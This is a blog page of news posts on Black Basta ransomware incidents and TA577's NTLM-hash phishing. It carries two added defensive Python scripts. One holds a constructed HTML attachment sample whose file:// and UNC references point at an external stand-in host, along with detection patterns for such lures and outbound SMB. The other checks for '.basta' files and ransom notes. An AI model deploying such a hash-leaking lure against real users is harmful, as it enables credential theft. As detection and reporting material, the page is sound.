Posts with label Black Basta Ransomware

Black Basta Targets Microsoft Teams with New Ransomware Tactics

The Black Basta ransomware group has resurfaced with a concerning method of spreading file-encrypting malware, now targeting Microsoft Teams. The group, notorious for cyberattacks on technology, finance, and public sector industries, exploits the popular collaboration platform to infiltrate networks.

First observed in October 2024, this new tactic marks a shift from previous approaches. Active since April 2022, Black Basta initially used spam and social engineering to distribute malware. Now the group impersonates IT support staff or colleagues and tricks users into entering credentials into fake network logins, which enables the deployment of malware. This deceptive method replaces older techniques such as phone-based social engineering.

Microsoft Teams is a strategic target due to its global use in corporate communication. Many employees trust messages within the platform, often overlooking verification steps. This makes them more vulnerable to attackers who exploit this trust to gain unauthorized access.

In 2023, Black Basta was connected to email phishing campaigns involving links to malicious websites. While those campaigns focused on harvesting credentials and delivering malware, the group's shift to real-time platforms like Teams indicates a significant evolution in their strategy.

Microsoft urges users to exercise caution with suspicious messages, especially those requesting sensitive information or financial transactions. "If a message in Teams appears to ask for credentials or money transfers, users are advised to verify the sender’s identity through other channels," the company recommended. Avoiding unknown links and confirming requests through phone or email are key practices to prevent such attacks.

Ascension Breached Due to Employee Downloading Malicious File

Ascension, one of the largest healthcare systems in the United States, disclosed that a ransomware attack in May 2024 was initiated when an employee mistakenly downloaded a malicious file onto a company device.

The healthcare provider indicated that the employee likely believed they were downloading a legitimate file, classifying the incident as an "honest mistake."

The ransomware attack disrupted the MyChart electronic health records system, phone lines, and systems for ordering tests, procedures, and medications. In response, Ascension took some devices offline on May 8 to address what was initially termed a "cyber security event."

As a result, staff had to record procedures and medications manually since electronic patient records were inaccessible. Ascension also temporarily halted some non-urgent elective procedures, tests, and appointments and redirected emergency medical services to other facilities to avoid delays in patient care.

As of Wednesday, Ascension reported that certain services remain affected and that efforts to restore electronic health record systems, patient portals, and phone systems, as well as test, procedure, and medication ordering systems, are ongoing.

An ongoing investigation revealed that the attackers accessed and stole files from only seven of the thousands of servers on Ascension's network.

"Currently, we have evidence showing the attackers accessed files from a limited number of servers used by our staff for daily tasks. These servers account for seven out of approximately 25,000 across our network," an Ascension spokesperson stated. "While the investigation continues, we believe some of the compromised files may contain Protected Health Information (PHI) and Personally Identifiable Information (PII), though the specific data affected varies."

However, Ascension has not found evidence that the attackers accessed data from its Electronic Health Records (EHR) and other clinical systems, which contain comprehensive patient records.

Though Ascension has not officially identified the responsible party, CNN reported that the Black Basta ransomware group is suspected to be behind the attack.

Shortly after the incident, the Health Information Sharing and Analysis Center (Health-ISAC) issued a warning that Black Basta had intensified its attacks on the healthcare sector.

Since its emergence in April 2022, Black Basta has targeted numerous high-profile organizations, including Rheinmetall, Capita, ABB, and the Toronto Public Library. Research by Elliptic and Corvus Insurance indicated that the group had extorted over $100 million from more than 90 victims as of November 2023.

As a major nonprofit health network, Ascension operates 140 hospitals and 40 senior care facilities. In 2023, it reported a total revenue of $28.3 billion. The organization employs 8,500 providers, with 35,000 affiliated providers and 134,000 associates across 19 states and the District of Columbia.

New Email Scam Targets NTLM Hashes in Covert Data Theft Operation

Researchers at security firm Proofpoint have identified the threat actor TA577 as the operator of a sophisticated phishing campaign. The group is currently using a new phishing method built around ZIP archive attachments, aimed at stealing users' NT LAN Manager (NTLM) hashes.

According to Proofpoint's investigation, the group is using an attack chain designed to steal NTLM authentication data. If exploited, the method could expose sensitive information and enable further malicious activity.

The threat actor, known for establishing initial access to organizations' computer systems and networks, is using booby-trapped email attachments to steal employees' NTLM hashes. Earlier this week, enterprise security firm Proofpoint published a report stating that the new attack chain "is capable of gathering sensitive information and facilitating follow-on activities."

The company reports that at least two phishing campaigns have used this approach since February 26, 2024, distributing thousands of messages worldwide and targeting hundreds of organizations. TA577, an initial access broker (IAB), has previously been associated with Qbot and linked to Black Basta ransomware infections.

Proofpoint also noted that although it has seen TA577 favouring Pikabot deployment in recent months, the two recent campaigns indicate a different approach: a growing interest in abusing authentication protocols rather than simply deploying malware.

NTLM hashes underpin authentication and session management on Windows systems. Attackers prize them because they can be cracked offline to recover passwords, or used directly in pass-the-hash attacks, where the hash stands in for the password when authenticating to a service.

The attackers use a technique known as thread hijacking: phishing emails crafted to look like legitimate replies in an ongoing conversation. The emails carry personalized ZIP files containing HTML documents; when opened, the HTML causes the victim's machine to connect to an external server set up specifically to capture NTLM hashes.

TA577 likely has the resources, time and experience to iterate and test new delivery methods, judging by the pace at which it adopts and distributes new tactics, techniques and procedures (TTPs). Like other IABs, TA577 appears to track the threat landscape closely and understands when and why particular attack chains stop being effective.

That allows the group to devise new ways to bypass detections and increase the likelihood that victims engage with its payloads, and to put those methods to use quickly. Proofpoint researchers have also noticed an increase in the use of file scheme URIs that direct recipients to external file shares over SMB and WebDAV for malware delivery. To counter the technique seen in this campaign, organizations should block outbound SMB traffic.

Restricting guest access to SMB servers is a simple security measure, but it does not by itself stop these attacks. The company advises implementing strict email filtering, disallowing outbound SMB connections, and enabling the relevant Windows group policies to reduce the risk.
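As an added example (not code from the original post or from Proofpoint), the following Python script applies two of the defensive checks described above to constructed sample data. It scans an HTML attachment for file scheme URIs and UNC paths, the references that make a Windows host open an outbound SMB or WebDAV connection, and it scans egress firewall log lines for SMB connections from internal hosts to addresses outside the internal ranges, which is the traffic that blocking outbound SMB is meant to stop. The log format, the IP addresses (documentation ranges standing in for external hosts) and the internal network ranges are all assumptions.

```python
"""Added example: detection checks for the NTLM-leak delivery technique.
Not code from the original post or from Proofpoint; the HTML sample, the
log format and the addresses below are constructed for illustration."""
import ipaddress
import re
from typing import Dict, List

# References inside an HTML attachment that make Windows open an SMB/WebDAV
# connection (and offer an NTLM handshake) when the document is rendered:
# file:// URIs and UNC paths of the form \\host\share\...
FILE_URI_RE = re.compile(r'file://[^\s"\'<>]+', re.IGNORECASE)
UNC_PATH_RE = re.compile(r'\\\\[A-Za-z0-9.\-]+\\[^\s"\'<>]*')

# Constructed attachment: a meta refresh and an image both pointing at an
# external host (203.0.113.10 is a documentation address standing in for
# an attacker-controlled server). The text is only parsed, never rendered.
SAMPLE_ATTACHMENT_HTML = (
    '<html><head><meta http-equiv="refresh" '
    'content="0; url=file://203.0.113.10/share/invoice.txt"></head>'
    '<body><img src="\\\\203.0.113.10\\pub\\logo.png"></body></html>'
)


def find_remote_file_refs(html: str) -> List[str]:
    """Return every file:// URI or UNC path referenced by an HTML document."""
    refs = FILE_URI_RE.findall(html) + UNC_PATH_RE.findall(html)
    return sorted(set(refs))


# Assumed internal address space (RFC 1918). Adjust to your environment.
INTERNAL_NETS = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
]
SMB_PORTS = {139, 445}

# Constructed egress firewall log, one connection per line:
#   <timestamp> <src_ip> <dst_ip> <proto>/<dst_port> <action>
SAMPLE_FW_LOG = """\
2024-02-26T10:01:02Z 10.1.4.23 10.1.4.5 tcp/445 allow
2024-02-26T10:01:09Z 10.1.4.23 203.0.113.10 tcp/445 allow
2024-02-26T10:01:15Z 10.1.4.23 198.51.100.7 tcp/443 allow
2024-02-26T10:02:30Z 10.1.7.9 203.0.113.10 tcp/80 allow
2024-02-26T10:03:44Z 10.1.7.9 192.0.2.55 tcp/445 deny
"""


def is_internal(ip: str) -> bool:
    """True if the address falls inside one of the assumed internal ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def outbound_smb_to_external(log_text: str) -> List[Dict[str, str]]:
    """Return SMB connections from internal hosts to external destinations.
    Denied attempts are returned too: a blocked connection still means
    something on the host tried to reach an external file share."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue  # skip malformed lines rather than crash on them
        ts, src, dst, proto_port, action = parts
        proto, _, port = proto_port.partition("/")
        if proto != "tcp" or not port.isdigit() or int(port) not in SMB_PORTS:
            continue
        if not is_internal(src) or is_internal(dst):
            continue  # internal-to-internal file sharing is expected traffic
        hits.append({"ts": ts, "src": src, "dst": dst, "port": port, "action": action})
    return hits


if __name__ == "__main__":
    for ref in find_remote_file_refs(SAMPLE_ATTACHMENT_HTML):
        print("attachment references remote file:", ref)
    for hit in outbound_smb_to_external(SAMPLE_FW_LOG):
        print("outbound SMB to external host:", hit)
```

Running the script reports the two remote references in the attachment and the two SMB connections that left the internal ranges (one allowed, one denied). The internal ranges are checked explicitly rather than via `ipaddress.is_private`, because that property also treats the documentation ranges used here as private.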

Microsoft has added security features to Windows 11 to help counter NTLM-based threats. Constant vigilance and strong security measures remain necessary to prevent phishing attacks that target the NTLM authentication protocol, and organizations must keep abreast of emerging threats and adjust their defences to keep pace.

Dealer of Jet Engines to Major Airlines Reveals 'Unauthorized Activity'

The Willis Lease Finance Corporation has disclosed to US regulators that it was targeted in a "cybersecurity incident," with data allegedly taken from the company being shared on the Black Basta ransomware group's leak blog.

In a filing submitted to the Securities and Exchange Commission (SEC) on February 9, the NASDAQ-listed company stated that it became aware of a potential breach on January 31, prompting immediate action to address the situation.

According to the filing, the company initiated an investigation into the incident with the help of leading cybersecurity experts, taking measures to contain and address the activity, including temporarily shutting down certain systems. The company reported no unauthorized activity after February 2, 2024, and believes it has successfully contained the breach.

During the period when systems were offline, the company acknowledged resorting to alternative methods to maintain operations and serve customers, although specific details were not provided.

Willis Lease Finance also stated it is still evaluating the extent of the breach and whether any data was compromised. Law enforcement has been notified about the breach.

Although the company refrained from explicitly mentioning "ransomware" or "attack" in its disclosure, the presence of passport scans on Black Basta's website suggests that the investigation into potential data theft may yield results soon.

The ransomware group claims to have obtained 910 GB of company data, including information about customers, employees, HR records, non-disclosure agreements (NDAs), among others. Black Basta published a selection of documents online, including screenshots of accessed files, HR documents containing social security numbers, and identity documents such as passports.

Attempts to match names on these documents with online profiles revealed matches predominantly in the US and UK, along with some from other countries.

Efforts to reach Willis Lease Finance for comment were unsuccessful at the time of reporting.

In business for over 45 years, Willis Lease Finance describes itself as a leading independent provider of jet engines to major airlines worldwide.

Black Basta, known for its high-profile ransomware attacks, is linked to the now-defunct Conti group and is believed to have amassed over $100 million from its victims, including major organizations like Capita and Southern Water in the UK.

Hyundai Motor Europe Grapples with Cyber Threat as Black Basta Ransomware Strikes

A California union and Hyundai Motor Europe separately announced this week that they had suffered cyberattacks in the past month resulting in the loss of data. Black Basta, a double-extortion group that first emerged in 2022, claims to have stolen more than 3 TB of Hyundai Motor Europe's data.

The carmaker has not confirmed that it was infected by ransomware, nor has it confirmed Black Basta's claims. An attack on the Hyundai Motor Europe division of the South Korean company earlier this year has, however, been confirmed by the division's CEO.

Hyundai Motor Europe was first reported to have suffered a cyberattack in mid-January; Hyundai promptly dismissed the report, describing the matter as simply IT issues. According to BleepingComputer, which first reported the story on Thursday, the South Korean automaker said in early January that it was having "IT problems" that it was "working to resolve as soon as possible."

The story has spread quickly since then. Over the past week the outlet was told that Black Basta is connected with the incident and the alleged theft of 3 TB of data. At the time of publishing, Cybernews had seen no mention of Hyundai or the stolen data on Black Basta's dark web leak site, but extortion groups commonly wait until ransom negotiations have firmly broken down before posting about their victims.

Hyundai has not yet issued a further statement on which systems were compromised in the attack, how much sensitive data may have been accessed, or the extent of the damage. The Black Basta ransomware gang claims to have hacked Hyundai Motor Europe and stolen three terabytes of its data.

The threat actors have provided evidence of the breach, which appears to cover data from several departments, including legal, sales and human resources. The data reportedly includes email addresses, physical addresses, phone numbers and vehicle chassis numbers of affected individuals.

An unauthorized third party accessed the customer database of Hyundai Italy, according to the data breach letter sent to impacted individuals. Hyundai Italy has notified the privacy watchdog and hired cybersecurity experts to determine the scope of the incident.

In the evidence provided to BleepingComputer, the crooks showed that the breach spanned multiple departments of the business, including legal, sales and human resources. In April, Hyundai had announced yet another data breach, affecting Italian and French car owners as well as customers who had booked a test drive.

The impacted individuals' email addresses, physical addresses, telephone numbers and vehicle chassis numbers were exposed, information that threat actors could misuse. According to a letter sent to the impacted individuals notifying them of the breach, an unauthorized third party had accessed the customer database.

The incident has been reported to the privacy watchdog in Italy, and Hyundai has hired an external cybersecurity expert to determine the extent of the issue. The letter indicated that no financial information had been disclosed.

In December 2019, German media reported that suspected members of the Vietnam-linked APT OceanLotus (APT32) group had breached the networks of the automakers BMW and Hyundai as part of a hacking campaign aimed at stealing automotive trade secrets.

Active Threat of Black Basta Ransomware on US Companies by QakBot Malware

Joakim Kandefelt and Danielle Frankel, researchers at the cybersecurity company Cybereason, recently reported that the Black Basta ransomware operation is running a new campaign targeting U.S. companies with QakBot malware. Through this campaign the malicious actors gain a foothold in, and later take over, the organization's network.

The threat actors use Black Basta ransomware to seize the data on a victim's network or system. The ransomware is aimed at organizations rather than individuals: it encrypts and locks the targeted organization's data using encryption that cannot be broken without the specific decryption keys.

Black Basta ransomware was first observed in April and is considered an offshoot of the Conti ransomware. It uses the well-established double-extortion method: confidential information is stolen from the targeted organization and then used to coerce the victim into paying a ransom, with the attackers threatening to release the information publicly if the demanded ransom is not paid.

A Black Basta attack leaves visible changes on the victim's desktop: original files are renamed with the '.basta' extension, the desktop background is replaced with a new image, and a file named "readme.txt" is created on the system. The wallpaper image carries a short message directing the targeted users to open that text file.
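The on-disk traces just listed are what a responder looks for first when triaging a suspected infection. As an added example (not code from the original post or from Cybereason), the Python script below walks a directory tree and reports, per directory, how many files carry the '.basta' extension, how many files there are in total, and whether a readme.txt sits beside them. The sample tree is built in a temporary folder and every file name in it is made up.

```python
"""Added example: a host-side triage check for the on-disk traces of a
Black Basta infection ('.basta' renamed files and a dropped 'readme.txt').
Not code from the original post or from Cybereason; the sample directory
tree is constructed in a temporary folder and the file names are made up."""
import os
import tempfile
from typing import Any, Dict, List

RANSOM_EXT = ".basta"       # extension appended to encrypted files
RANSOM_NOTE = "readme.txt"  # note dropped beside them


def scan_tree(root: str) -> Dict[str, Dict[str, Any]]:
    """Walk a directory tree and summarise, for every directory that holds
    either indicator, how many files carry the extension, how many files
    there are in total, and whether a readme.txt is present."""
    report: Dict[str, Dict[str, Any]] = {}
    for dirpath, _subdirs, files in os.walk(root):
        encrypted = [f for f in files if f.lower().endswith(RANSOM_EXT)]
        has_note = any(f.lower() == RANSOM_NOTE for f in files)
        if encrypted or has_note:
            report[dirpath] = {
                "encrypted": len(encrypted),
                "total": len(files),
                "note": has_note,
            }
    return report


def suspected_dirs(report: Dict[str, Dict[str, Any]]) -> List[str]:
    """Directories that contain at least one '.basta' file, most affected
    first. A readme.txt on its own is deliberately not treated as an
    indicator: plenty of legitimate software ships one, so it only adds
    weight when it sits next to renamed files."""
    hits = [d for d, v in report.items() if v["encrypted"] > 0]
    return sorted(hits, key=lambda d: (-report[d]["encrypted"], d))


def build_sample_tree(root: str) -> None:
    """Create a constructed tree: two directories showing the indicators
    and one directory with a harmless readme.txt and no renamed files."""
    layout = {
        "finance": ["q1.xlsx.basta", "q2.xlsx.basta", "budget.docx.basta", "readme.txt"],
        "hr": ["policy.docx.basta", "notes.txt", "readme.txt"],
        "public": ["index.html", "readme.txt"],
    }
    for sub, names in layout.items():
        os.makedirs(os.path.join(root, sub))
        for name in names:
            with open(os.path.join(root, sub, name), "w") as fh:
                fh.write("sample\n")


def demo() -> Dict[str, Any]:
    """Build the sample tree, scan it and return the findings with
    directory names relative to the temporary root."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        report = scan_tree(root)
        rel = {os.path.relpath(d, root): v for d, v in report.items()}
        flagged = [os.path.relpath(d, root) for d in suspected_dirs(report)]
    return {"report": rel, "suspected": flagged}


if __name__ == "__main__":
    result = demo()
    for d in result["suspected"]:
        v = result["report"][d]
        print(f"{d}: {v['encrypted']}/{v['total']} files renamed, note present: {v['note']}")
```

Against a real host the `root` passed to `scan_tree` would be a mounted volume or a forensic image rather than the temporary tree; the ranking puts the directories with the most renamed files first, which is usually where encryption started or ran longest.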

The prime target companies of the ransomware are from the U.S., Canada, Australia, and New Zealand. 

QakBot, used in Black Basta's latest campaign, dates back to 2019 and has featured in many other ransomware attacks, such as the one on Fujifilm Holdings Corp in 2020. What makes QakBot so widely used by attackers is that once it gains access to a target's network, it also opens an entry point for the threat actor to deploy additional malware.

Cybereason's study of the campaign found that the operators behind it are highly advanced and work in a sophisticated manner. In one attack under this campaign, the malicious actors gained access to the victim's network domain within two hours and were able to deliver the ransomware within twelve hours.

Cybereason warned organizations to be aware of and protect themselves against these attacks, and listed several precautionary measures: companies should be alert to and prevent Black Basta and QakBot infections, and Cybereason customers should enable variant payload protection and block vulnerable users and sources.

Every organization should also watch for network connections that appear malicious. Cybereason further advises resetting Active Directory access.